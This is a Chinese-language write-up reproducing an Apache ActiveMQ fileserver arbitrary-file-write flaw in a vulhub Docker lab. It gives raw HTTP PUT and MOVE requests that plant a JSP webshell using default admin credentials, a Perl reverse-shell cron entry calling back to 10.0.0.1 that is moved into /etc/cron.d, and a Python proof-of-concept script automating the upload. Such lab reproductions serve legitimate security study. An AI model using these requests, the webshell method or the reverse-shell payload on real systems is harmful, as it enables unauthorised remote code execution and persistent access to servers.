0x00 安装docker-compose

Ubuntu安装docker-compose

使用DaoCloud源下载

sudo curl -L https://get.daocloud.io/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose

设置权限

sudo chmod +x /usr/local/bin/docker-compose

0x01 启动漏洞环境

漏洞影响版本

Apache ActiveMQ 5.x ~ 5.14.0

首先将漏洞环境全部Git到服务器上

git clone https://github.com/vulhub/vulhub.git

随后进入到对应的目录即可

docker-compose up -d

随后会开始下载，并启动

0x02 漏洞复现

首先直接访问http://ip:8161

1、写入WebShell

首先查看ActiveMQ的绝对路径

http://ip:8161/admin/test/systemProperties.jsp

随后使用PUT请求上传一个SHELL

我们为了更具体的判断上传成功，进入docker查看是否有该文件

find . -name "UzJu.txt"

PUT /fileserver/UzJu.txt HTTP/1.1
Host: ip:8161
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT
Connection: close
Content-Length: 15

UzJu_Test....:)

随后将文件移动到Web目录下的API文件夹中

file:///opt/activemq/webapps/api/UzJu.jsp

MOVE /fileserver/UzJu.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/UzJu.jsp
Host: 106.52.5.116:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=1kj9fz5gan2yd1wstqeinp6pkh
Connection: close

随后我们查看API目录下，确认文件是否已经移动

随后访问WebShell

http://ip:8161/api/UzJu.jsp

2、写crontab弹Shell

PUT /fileserver/time.txt HTTP/1.1
Host: ip:8161
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
If-Modified-Since: Fri, 13 Feb 2015 18:05:11 GMT
Connection: close
Content-Length: 241

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

写入成功，随后移动文件到/etc/cron.d/下

Ps: 这个方法需要ActiveMQ是root运行，否则也不能写入cron文件。

0x03 编写poc

这里使用Python编写POC

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@Project ：UzJuSecurityTools 
@File    ：2.ActiveMQFileWrite.py
@Author  ：UzJu
@Date    ：2021/12/27 10:26 下午 
@Email   ：UzJuer@163.com
'''

import requests


class ActiveMQFileWrite:
    def __init__(self, url, username, password):
        self.url = url
        self.poc = "UzJu_test"
        self.path = "/fileserver/UzJu_1.txt"
        self.username = username
        self.password = password

    def getUploadFile(self):
        result = requests.put(url=self.url + self.path,
                              data=self.poc)
        if result.status_code == 204:
            print(f"[+]WebShell-{self.poc}写入成功")
        else:
            print(f'[-]写入失败, 状态码:{result.status_code}')

    def getAndMoveFile(self):
        headers = {
            "Destination": "file:///opt/activemq/webapps/api/UzJu_1.jsp"
        }
        result = requests.request("MOVE",
                                  url=self.url + self.path,
                                  headers=headers)
        if result.status_code == 204:
            print(f"[+]文件移动成功，请访问,{self.url}/api/UzJu_1.jsp")
        else:
            print(f"[-]文件移动失败，状态码:{result.status_code}")

    def getCheckVuln(self):
        result = requests.get(url=self.url + "/api/UzJu_1.jsp",
                              auth=(self.username, self.password))
        if result.status_code == 200:
            print(f"[+]存在漏洞, Payload: {result.text}")
        else:
            print(f"[-]不存在漏洞，或文件上传失败，或其他原因")


if __name__ == '__main__':
    main = ActiveMQFileWrite('http://ip:8161', "admin", "admin")
    main.getUploadFile()
    main.getAndMoveFile()
    main.getCheckVuln()

运行截图

访问试试

0x04 参考

1、https://blog.csdn.net/nzjdsds/article/details/116102632

2、https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2016-3088/README.md

3、https://www.secpulse.com/archives/60064.html